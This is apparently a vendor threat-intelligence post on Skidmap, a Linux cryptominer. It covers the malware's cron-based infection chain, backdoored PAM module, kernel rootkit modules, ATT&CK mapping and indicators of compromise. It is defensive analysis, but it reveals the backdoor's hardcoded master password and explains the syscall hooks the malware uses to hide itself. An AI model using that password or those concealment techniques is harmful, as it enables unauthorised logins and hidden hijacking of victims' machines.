Hijacking machine resources and using them to mine for cryptocurrency continues to be an attractive and lucrative target for threat actors. As we’ve continued to see this type of attack used, we’ve also seen more platforms being targeted. Seeing cryptocurrency mining malware targeting Linux and macOS is becoming more common. In September, Trend Micro reported on a new cryptocurrency miner targeting Linux machines. This threat continues to be active and is particularly interesting due to the sophisticated methods it uses to hide its activity.
Behavioral Summary
The malware is initially triggered from a cron job. The cron job will run periodically and reach out to the C2 server to download the pm.sh script. When the pm.sh script runs, it will ensure the main malware executable, pc, is installed and running. When the main executable runs, it will replace pam_unix.so with a backdoored version. Then it will attempt to disable SELinux and install an authorized SSH key. You can see this initial behavior in the CB Threat Hunter event log below.
Figure 1: CB Threat Hunter event log
Finally, pc will determine whether it is running on a RHEL/CentOS machine or a Debian one. On a Debian based machine it will download the malicious miner2 application and invoke it. On a RHEL/Centos machine it will download a tar file and decrypt and unpack it. The tar file consists of the rest of the payload and the mining application for RHEL/CentOS machines.
After unpacking the tar it will kick off the kaudited application. This application is responsible for dropping and installing backdoor kernel modules as well as running additional binaries.
Figure 2: CB Threat Hunter process tree for kaudited
One of the binaries initiated by kaudited is a binary called systemd-network. The systemd-network binary is solely responsible for starting the cryptocurrency mining application pamdicks.
Details
As mentioned in the summary, one of the most interesting aspects of this threat is the great lengths that it goes to hide its activity. The following are details on the handful of system components dropped by this threat.
pam_unix.so
This is dropped by the initial binary, pc, but also dropped again by kaudited. This is a backdoored version of the standard PAM Unix authentication module. The pam_sm_authenticate function normally just calls unix_verify_password to check if the authenticating users password is valid. In this backdoored version of the module there’s a hardcoded password of Mtm$%889GS3%G that will allow the authentication as any user.
iproute.ko
This kernel module is dropped by the kaudited binary. When this kernel module is loaded it will hide itself from the list of loaded modules and then hook the getdents syscall. The getdents syscall is used to read the contents of a directory. The hooked version of getdents hides files with the following names:
| kswaped | ipv6_kac.ko |
| kaudited | usb_control |
| ip6network | S94ip6network |
| ip4network | S95systemd-network |
| systemd-network | pptpctrl |
| xpropd | ndptxeinfo |
| xcond | helpmaninfo |
| pluto | libxml2info |
| mingety | pkeeminfo |
| xiscsd | grub2-infolist |
| tplinkd | loadpixcare |
| pascald | loadxjump |
| gemdos2d | irqbalanced |
| gloofields | libpcmcia.so |
| hopformdit | ld.so.preload |
| pkeeminfo | vpnserver |
| pamdicks | ssd_control |
| rxmlb2 | iproute.ko |
| mdpsloads | netlink.ko |
| infiniex | cryptov2.ko |
| lzmoinfo | acpi_console.ko |
| picsmanager | raid_console.ko |
| perkiseek | ilog.h |
| sequemanx | olog.h |
| oddobjump | tinymapper |
| pdxmlmtg | udp2raw |
| mpidrubit | tinyvpn |
| hansiupxd | rctlconf |
| helpmaninfo | rctlcli |
| mpartinconf | rctlser |
| raid.ko | rctl_cert.pem |
| iptable_mac.ko | rctl_priv.pem |
| snd_pcs.ko | rctl_ca.crt |
| usb_pcs.ko |
rctlcli.cfg |
Table 1: List of files hidden by iproute.ko
netlink.ko
This kernel module is dropped by the kaudited binary. When this kernel module is loaded it will hide itself from the list of loaded modules. It also hooks the getdents syscall and checks returned entries against a list of hardcoded strings in order to determine if the entry should be hidden or not.
Then it proceeds to hook the various seq_show implementations in the kernel for TCP and UDP over IPv4 and IPv6. This allows it to hide network traffic. Finally the following functions are hooked in order to hide the CPU and load usage by the malware:
- account_user_time
- acct_account_cputime
- task_nice
- cpuacct_account_field
- loadavg_proc_show
- nr_running
- task_active_pid_ns
The goal of this module is to allow the cryptocurrency mining application to run without letting users on the system see the increased usage of the CPU and network.
cryptov2.ko
This kernel module is dropped by the kaudited binary. When this kernel module is loaded it will hide itself from the list of loaded modules. It then goes on to install two netfilter hooks in the kernel. The two hook points used are NF_INET_LOCAL_IN and NF_INET_LOCAL_OUT and both for protocol NFPROTO_IPV4. This allows the module to potentially inspect all incoming and outgoing packets from the machine. Even though the module initialization code registers two hooks the hook function for NF_INET_LOCAL_OUT is actually NULL’ed out and only incoming packets are inspected. The module allows any traffic that isn’t TCP or UDP. In the case of TCP or UDP the module will inspect the packets for certain ports and selectively allow or deny the traffic.
For more information, click here.
MITRE ATT&CK TIDs
| TID | Tactic | Description |
|---|---|---|
| T1168 | Persistence, Execution | Local Job Scheduling |
| T1215 | Persistence | Kernel Modules and Extensions |
| T1045 | Defense Evasion | Software Packing |
| T1089 | Defense Evasion | Disabling Security Tools |
| T1036 | Defense Evasion | Masquerading |
| T1014 | Defense Evasion | Rootkit |
| T1071 | Command And Control | Standard Application Layer Protocol |
| T1496 | Impact | Resource Hijacking |
Indicators of Compromise (IOCs)
| Indicator | Type | Context |
|---|---|---|
| 3da213cceba51e123a31b4a67f461ef8901d2b77505776ab9852df9edbbd10c9 | SHA256 | pm.sh |
| d797706202e9291ffce6729ac98aad5bd3ae1aef5e01da9139395f038e94fb2f | SHA256 | pc |
| 3b1dafb3dd42a4d7d4d85a9972151f8c99f00a9613b90253df0f043b3a46cb69 | SHA256 | miner2 |
| d50fd8996435b4e8d74ab824ba4c3cf4e54558dd4fd5da9abe3269ea82a1eda2 | SHA256 | pam_unix.so |
| f706def8a4366e8ed3f0f14825b8901e7af5154f28dfb44288d4d596012ee542 | SHA256 | iproute.ko |
| eddad25adce89b5954ddf6d85936ec5bdec6ccd20eda1f0fbce527f69347bc32 | SHA256 | netlink.ko |
| 3064ed1844054e65a1313c4ce61777b259df0c1ec335618f9154430fccf6ef29 | SHA256 | cryptov2.ko |
| 954e08c703a5be53c96ac08ad14cd27ff9ac658b2e09c11e1f303aa4630bc1ab | SHA256 | systemd-network |
| b81e85de4419ce820a59f36ec583fb9e37ec50f9ef45d0484f6ebb993c70954e | SHA256 | kswaped |
| f6d419af8a67de46d60365929629ae5884bde82964cb5bce376aadb6a72f93d6 | SHA256 | pamdicks |
| pm[.]ipfswallet[.]ml | DNS | C2 |
| pm[.]ipfswallet[.]tk | DNS | C2 |
| info[.]onlinetalk[.]tk | DNS | C2 |
| pm[.]cpuminerpool[.]com | DNS | C2 |
The post Threat Analysis Unit (TAU) Threat Intelligence Notification: Skidmap appeared first on VMware Carbon Black.
Article Link: https://www.carbonblack.com/2019/12/10/threat-analysis-unit-tau-threat-intelligence-notification-skidmap/